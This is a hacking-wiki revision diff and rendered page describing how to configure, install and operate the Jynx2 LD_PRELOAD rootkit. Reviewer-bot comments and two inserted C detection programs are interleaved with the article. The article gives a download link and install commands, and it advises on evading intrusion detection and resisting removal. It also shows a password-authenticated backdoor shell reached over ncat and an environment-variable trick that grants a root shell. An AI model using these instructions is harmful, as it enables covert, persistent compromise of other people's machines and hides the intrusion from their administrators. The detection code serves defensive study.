Difference between revisions of "Jynx Rootkit/2.0"
(→HIGH_PORT and LOW_PORT) |
|||
(39 intermediate revisions by 6 users not shown) | |||
Line 1: | Line 1: | ||
− | {{info|Jynx2 is an expansion of the | + | {{info|Jynx2 is an expansion of the [[Jynx Rootkit/1.0|original Jynx]] [[LD_Preload]] rootkit written in [[C]] with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.}} |
<strong> _ _,.-.' .-. | <strong> _ _,.-.' .-. | ||
_ .' |,' ."".| |.""._ | _ .' |,' ."".| |.""._ | ||
Line 48: | Line 48: | ||
\______/ | \______/ | ||
</strong> | </strong> | ||
+ | {{crime}} | ||
+ | <font size="-2">Special thanks to [[User:ErrorProne|ErrorProne]] and [[User:Xochipilli|xo]] for their contributions to this article.</font> | ||
=Features= | =Features= | ||
* Hiding from netstat | * Hiding from netstat | ||
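Review bot: the acknowledgement line added under {{crime}} is sized with <font size="-2">, which is obsolete presentational HTML. Wrapping it in <small>...</small> keeps the same visual effect without the deprecated tag.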
Line 55: | Line 57: | ||
* Multi-factor authentication | * Multi-factor authentication | ||
* Improved anti-removal features | * Improved anti-removal features | ||
+ | * SUID Drop-shell with environment variable | ||
{{protip|It is possible to make Jynx2 even more difficult to remove by hooking [[C]]'s link() function, therefore we recommend that any [[LD_Preload]] rootkit be removed using a LiveCD.}} | {{protip|It is possible to make Jynx2 even more difficult to remove by hooking [[C]]'s link() function, therefore we recommend that any [[LD_Preload]] rootkit be removed using a LiveCD.}} | ||
− | |||
=Archive Contents= | =Archive Contents= | ||
[root@ares jynx2]# ls | [root@ares jynx2]# ls | ||
Makefile README config.h jynx2.c packer.sh reality.c | Makefile README config.h jynx2.c packer.sh reality.c | ||
{{info|In this rendition of jynx, two '''shared libraries''' are built by the installation process. One, '''jynx2.so''' functions as the actual rootkit, while the other, '''reality.so''', functions as a method for the remote access user to be able to see their own files and processes.}} | {{info|In this rendition of jynx, two '''shared libraries''' are built by the installation process. One, '''jynx2.so''' functions as the actual rootkit, while the other, '''reality.so''', functions as a method for the remote access user to be able to see their own files and processes.}} | ||
− | |||
=Configuration Options in Config.h= | =Configuration Options in Config.h= | ||
{{warning|Improper configuration of Jynx2 can result in severe system instability, including [[segmentation fault|segmentation faults]] of nearly every process on the infected host.}} | {{warning|Improper configuration of Jynx2 can result in severe system instability, including [[segmentation fault|segmentation faults]] of nearly every process on the infected host.}} | ||
==MAGIC_STRING== | ==MAGIC_STRING== | ||
− | MAGIC_STRING is the name of the directory that | + | * '''MAGIC_STRING''' is the name of the directory that jynx installs to from the top level directory '''/'''. By default, this directory is hidden from the root user via the magic '''UID''' and '''GID'''. If the '''MAGIC_STRING''' is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".{{info|this can be used as a prefix to any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory.}} |
− | + | ||
− | + | ||
− | {{info|this can be used as a prefix to | + | |
==MAGIC_GID and MAGIC_UID== | ==MAGIC_GID and MAGIC_UID== | ||
* Similar to the original [[Jynx Rootkit]], Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID. | * Similar to the original [[Jynx Rootkit]], Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID. | ||
− | {{protip|Due to the fact that adding a user/group to the machine may set off a [[HIDS]], we recommend that the MAGIC_UID and MAGIC_GID be set to a commonly unused service user's information (e.g. cupsd or lp) for maximum [[IDS Evasion]], as no files will suddenly disappear and the least files in /etc/ will be modified.}} | + | {{protip|Due to the fact that adding a user/group to the machine may set off a [[HIDS]], we recommend that the MAGIC_UID and MAGIC_GID be set to a commonly unused service user's information (e.g. cupsd or lp's UID and GID) for maximum [[IDS Evasion]], as no files will suddenly disappear and the least files in /etc/ will be modified.}} |
− | + | ||
==REALITY_PATH== | ==REALITY_PATH== | ||
− | This is the path | + | * <i>This is the path where '''reality.so''' will be copied to. By default, Jynx2 will install this into /XxJynx/reality.so. </i>{{notice|It is recommended to set REALITY_PATH to '''/$MAGIC_STRING/reality.so''' in order to keep this file hidden from the root user.}} |
− | By default, Jynx2 will install this into / | + | |
− | + | ||
− | It is recommended | + | |
==CONFIG_FILE== | ==CONFIG_FILE== | ||
− | The CONFIG_FILE defaults to ld | + | {{info|The '''CONFIG_FILE''' defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the [[LD_Preload|LD_PRELOAD]] environment variable if overwriting /etc/ld.so.preload is unfavorable.}} |
− | + | ||
+ | ==MULTI-FACTOR AUTHENTICATION== | ||
+ | {{notice|'''<i>Jynx2 uses two-factor [[authentication credential|authentication]]. </i>'''{{code|text=With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.}}}} | ||
+ | The first are '''HIGH_PORT''' and '''LOW_PORT''', which default to 41, and 43 respectively. The source port of a client connection must fall between this port range in order to activate Jynx2's accept() hook. Because this port is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port. | ||
+ | The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting, defaulting to "'''DEFAULT_PASS'''", it should be changed before compilation. | ||
− | == | + | ==LIBC_PATH== |
− | + | LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run '''ldd $(which ls)''' or something similar. {{protip|On multi-lib systems, configure this path to point to the '''64-bit''' version of LIBC.}} | |
+ | ==ENV_VARIABLE== | ||
+ | A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for [[privilege escalation]] by the remote user. | ||
− | + | =Download & Installation= | |
− | + | {{Info|It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device.}} | |
− | + | * '''Download URL''': http://blackhatlibrary.net/releases/jynx2.tgz | |
− | + | ==Installation== | |
− | + | # tar xzf jynx2.tgz # Unpack tarball | |
− | + | # nano -w config.h # Set configuration | |
− | + | # make all # Compile jynx2.so | |
− | + | # make install # Installs jynx2, injects into ld preload, and sets correct GIDs | |
− | + | ==Usage== | |
− | + | Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like: | |
<pre> | <pre> | ||
− | sudo ncat exploit.net 80 -p | + | [user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl |
− | + | DEFAULT_PASS | |
− | + | ||
− | + | ||
− | + | ||
Bump with shell. | Bump with shell. | ||
>ls -lia | >ls -lia | ||
− | 214473 drwxr-xr-x 2 | + | 214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 . |
− | 177137 drwxr-xr-x 15 | + | 177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 .. |
− | </pre> | + | </pre>{{protip| Make sure to using the ''--ssl'' flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.}} |
+ | By default, with XxJynx as the ENV_VARIABLE configuration: | ||
+ | >XxJynx=1 gpasswd / | ||
+ | >id | ||
+ | uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log) | ||
− | = | + | =Further Reading= |
− | + | * [[C]] | |
− | + | * [[Jynx Rootkit/1.0|Jynx version 1.0]] | |
− | + | * [[LD_Preload]] | |
− | + | * [http://resources.infosecinstitute.com/jynx2-sneak-peek-analysis/ Jynx2 Sneak peek, Analysis and Removal Instructions (Infosec Institute)] | |
− | == | + | {{InHouse}}{{series |
+ | | Name = Jynx2 | ||
+ | | PartOf = Linux | ||
+ | }} | ||
+ | [[Category:Maintaining_Access]] |
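Review bot: in the new MULTI-FACTOR AUTHENTICATION section, "HIGH_PORT and LOW_PORT, which default to 41, and 43 respectively" assigns the lower value to HIGH_PORT as written, while the usage example connects with -p 42. Please confirm which default belongs to which macro, say whether the bounds are inclusive, and open the sentence with "The first factor is" rather than "The first are". The protip appended after the usage block also needs "Make sure to use" and "instead" in place of "Make sure to using" and "in stead".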
Latest revision as of 08:33, 21 April 2013
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you.
Special thanks to ErrorProne and xo for their contributions to this article.
Features
- Hiding from netstat
- Hiding from ps/top and /proc
- File hiding
- SSL connect accept() hook
- Multi-factor authentication
- Improved anti-removal features
- SUID Drop-shell with environment variable
Archive Contents
    [root@ares jynx2]# ls
    Makefile README config.h jynx2.c packer.sh reality.c

In this rendition of jynx, two shared libraries are built by the installation process. One, jynx2.so, functions as the actual rootkit, while the other, reality.so, functions as a method for the remote access user to be able to see their own files and processes.
Configuration Options in Config.h
Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host.
MAGIC_STRING
- MAGIC_STRING is the name of the directory that jynx installs to from the top level directory /. By default, this directory is hidden from the root user via the magic UID and GID. If the MAGIC_STRING is set to "hiddendir", jynx2 will install to (and hide) the folder "/hiddendir".
This can be used as a prefix for any files or processes that the user wishes to hide; it is not limited exclusively to Jynx2's installation directory.
MAGIC_GID and MAGIC_UID
- Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
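A detection example added here (not part of the original article or of Jynx2): an LD_PRELOAD library can only filter what passes through libc, so comparing the kernel's raw getdents64 records with what readdir() returns exposes names hidden by prefix or by owner. It assumes the open() and syscall() wrappers are not themselves interposed; `raw_dirent`, `libc_sees` and `count_hidden` are names invented for this sketch.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

struct raw_dirent {               /* record layout written by getdents64(2) */
    unsigned long long d_ino;
    long long d_off;
    unsigned short d_reclen;
    unsigned char d_type;
    char d_name[];
};

/* Does readdir(), the path a preloaded library can interpose, list `name`? */
static int libc_sees(const char *dir, const char *name) {
    DIR *d = opendir(dir);
    struct dirent *e; int found = 0;
    if (d == NULL) return 0;
    while (!found && (e = readdir(d)) != NULL)
        found = strcmp(e->d_name, name) == 0;
    closedir(d);
    return found;
}

/* Count names the kernel returns that readdir() omits; -1 on error. */
int count_hidden(const char *dir) {
    char buf[8192] __attribute__((aligned(8)));
    long n, off;
    int hidden = 0, fd = open(dir, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    while ((n = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0) {
        for (off = 0; off < n; ) {
            struct raw_dirent *e = (struct raw_dirent *)(buf + off);
            off += e->d_reclen;
            /* ignore inode-0 records, which libc may drop by itself */
            if (e->d_ino != 0 && !libc_sees(dir, e->d_name)) {
                printf("hidden from libc: %s/%s\n", dir, e->d_name);
                hidden++;
            }
        }
    }
    close(fd);
    return n < 0 ? -1 : hidden;
}
int main(int argc, char **argv) {
    return count_hidden(argc > 1 ? argv[1] : "/") != 0;
}
```

Build it dynamically linked so that readdir() passes through any preloaded library. A non-zero count for / is the cue to continue the investigation from trusted boot media, as the LiveCD recommendation on this page suggests.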
REALITY_PATH
- This is the path to which reality.so is copied. By default, Jynx2 installs it to /XxJynx/reality.so. Notice: It is recommended to set REALITY_PATH to /$MAGIC_STRING/reality.so in order to keep this file hidden from the root user.
CONFIG_FILE
The CONFIG_FILE defaults to ld.so.preload, which is commonly located in the /etc directory. Alternatively, services can be backdoored by setting the LD_PRELOAD environment variable if overwriting /etc/ld.so.preload is unfavorable.
MULTI-FACTOR AUTHENTICATION
With Jynx2, the MAGIC_ACK/MAGIC_SEQ port-knocking authentication method was deprecated in favor of HIGH_PORT, LOW_PORT, and an accept() hook. This means that Jynx2 can backdoor any existing listening service without interrupting normal user interactivity for that service.

The first factor is HIGH_PORT and LOW_PORT, which default to 41 and 43 respectively. The source port of a client connection must fall within this port range in order to activate Jynx2's accept() hook. Because this port range is typically reserved for inbound connections, it is rare that any connection will randomly have this origin port.

The second factor in Jynx2 authentication is SHELL_PASSWORD. This should be the first line sent to the backdoor upon connecting. It defaults to "DEFAULT_PASS" and should be changed before compilation.
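Because legitimate clients rarely connect from a source port this low, the port window is also a network-side detection signal. The example below is added here (it is not from the article or from Jynx2) and flags TCP flows in constructed conntrack-style records whose original source port falls in the 41 to 43 window this page documents; the sample records and the names `WINDOW_LO`, `WINDOW_HI`, `suspicious` and `count_suspicious` are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* 41 and 43 are the defaults given on this page; an edited config.h differs. */
#define WINDOW_LO 41
#define WINDOW_HI 43

/* Constructed conntrack-style records using documentation addresses. */
static const char *SAMPLE_LOG[] = {
    "tcp 6 431999 ESTABLISHED src=198.51.100.7 dst=192.0.2.10 sport=51544 dport=80 "
    "src=192.0.2.10 dst=198.51.100.7 sport=80 dport=51544 [ASSURED]",
    "tcp 6 431990 ESTABLISHED src=203.0.113.9 dst=192.0.2.10 sport=42 dport=80 "
    "src=192.0.2.10 dst=203.0.113.9 sport=80 dport=42 [ASSURED]",
    "udp 17 25 src=198.51.100.8 dst=192.0.2.10 sport=42 dport=53 "
    "src=192.0.2.10 dst=198.51.100.8 sport=53 dport=42",
    "tcp 6 120 ESTABLISHED src=192.0.2.10 dst=198.51.100.9 sport=40112 dport=43 "
    "src=198.51.100.9 dst=192.0.2.10 sport=43 dport=40112 [ASSURED]",
    "tcp 6 300 ESTABLISHED src=203.0.113.9 dst=192.0.2.10 sport=41 dport=443 "
    "src=192.0.2.10 dst=203.0.113.9 sport=443 dport=41 [ASSURED]",
};
#define SAMPLE_N ((int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]))

/* 1 if a TCP record's original-direction source port is in [lo, hi].
 * Only the first "sport=" is read: the second belongs to the reply tuple. */
int suspicious(const char *line, int lo, int hi) {
    const char *sp = strstr(line, "sport=");
    int sport;
    if (strncmp(line, "tcp ", 4) != 0 || sp == NULL)
        return 0;
    if (sscanf(sp, "sport=%d", &sport) != 1)
        return 0;
    return sport >= lo && sport <= hi;   /* bounds inclusive, to miss nothing */
}

/* Print and count every suspicious record. */
int count_suspicious(const char *const *log, int n, int lo, int hi) {
    int hits = 0;
    for (int i = 0; i < n; i++)
        if (suspicious(log[i], lo, hi)) {
            printf("ALERT low source port: %s\n", log[i]);
            hits++;
        }
    return hits;
}

int main(void) {
    return count_suspicious(SAMPLE_LOG, SAMPLE_N, WINDOW_LO, WINDOW_HI) == 2 ? 0 : 1;
}
```

Run this kind of check on flow data collected off the host, since the rootkit hides its own connections from local tools. The window is a compile-time setting, so the defaults only catch unmodified builds.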
LIBC_PATH
LIBC_PATH is set in config.h and defines the path to the libc binary, which can be obtained by using ldd against any common coreutil or binutil. In order to locate this, simply run ldd $(which ls) or something similar.
ENV_VARIABLE
A new feature in Jynx2 is the ability to drop a local suid shell using an environment variable as defined in the configuration. When this environment variable is set, SUID executables will grant root access to the local machine for privilege escalation by the remote user.
Download & Installation
It is highly recommended that configuration be changed before compiling or installing Jynx2 to any device.
- Download URL: http://blackhatlibrary.net/releases/jynx2.tgz
Installation
    # tar xzf jynx2.tgz      # Unpack tarball
    # nano -w config.h       # Set configuration
    # make all               # Compile jynx2.so
    # make install           # Installs jynx2, injects into ld preload, and sets correct GIDs
Usage
Once Jynx2 is successfully installed on a target machine, accessing its accept() hook with the default configuration looks like:

    [user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
    DEFAULT_PASS
    Bump with shell.
    >ls -lia
    214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
    177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..
By default, with XxJynx as the ENV_VARIABLE configuration:
    >XxJynx=1 gpasswd /
    >id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
Further Reading
- C
- Jynx version 1.0
- LD_Preload
- Jynx2 Sneak peek, Analysis and Removal Instructions (Infosec Institute)